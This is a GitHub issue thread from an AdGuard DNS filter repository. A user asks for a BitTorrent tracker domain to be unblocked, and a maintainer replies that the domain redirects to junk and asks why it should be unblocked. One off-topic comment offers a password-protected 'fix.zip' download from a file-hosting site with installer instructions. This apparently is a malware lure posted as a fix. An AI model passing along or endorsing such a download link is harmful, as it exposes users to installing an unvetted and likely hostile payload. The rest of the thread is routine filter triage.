### ISSUE TITLE
wrong  blocked tk.greedland.net 

### ISSUE THREAD

**Issue by GoogleBeEvil** [AdguardTeam/AdGuardSDNSFilter#1742]
### Prerequisites

- [X] This site DOES NOT contains sexually explicit material;
- [X] The problem occurs only when using AdGuard DNS or DNS filtering with AdGuard DNS filter, it is not caused by other ad blockers;
- [x] You're using an up-to-date version of AdGuard DNS filter;
- [x] Browser version is up-to-date;
- [x] If a website or an app is broken, disabling AdGuard DNS filter resolves the issue.

### What DNS server do you use?

Other

### Version

v0.107.52

### What DNS upstream(s) do you use in AdGuard apps or AdGuard Home?

https://dns.bebasid.com/unfiltered

### What DNS filters do you have enabled?

https://adguardteam.github.io/AdGuardSDNSFilter/Filters/filter.txt

### What browser or app do you use?

Firefox

### Which device type do you use?

Other device

### What type of problem have you encountered?

Website or app doesn't work properly

### Where did you encounter the problem?

tk.greedland.net & qbittorent

### Add your comment and screenshots

use adg in router
this site is tracker server，it was in some trackerlist projects,and it was blocked by adg
![cap](https://github.com/user-attachments/assets/826ebb79-2319-487a-a2eb-ad9aa0520174)

### Privacy

- [x] I agree to follow this condition

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alex-302** [comment]
@GoogleBeEvil tk.greedland.net does not look like working domain, redirects to trash/ads.

**Comment by GoogleBeEvil** [comment]
> @GoogleBeEvil tk.greedland.net does not look like working domain, redirects to trash/ads.

it's a tracker server collected by some repo
https://github.com/XIU2/TrackersListCollection

**Comment by Alex-302** [comment]
@GoogleBeEvil Then why do you want to unblock it?
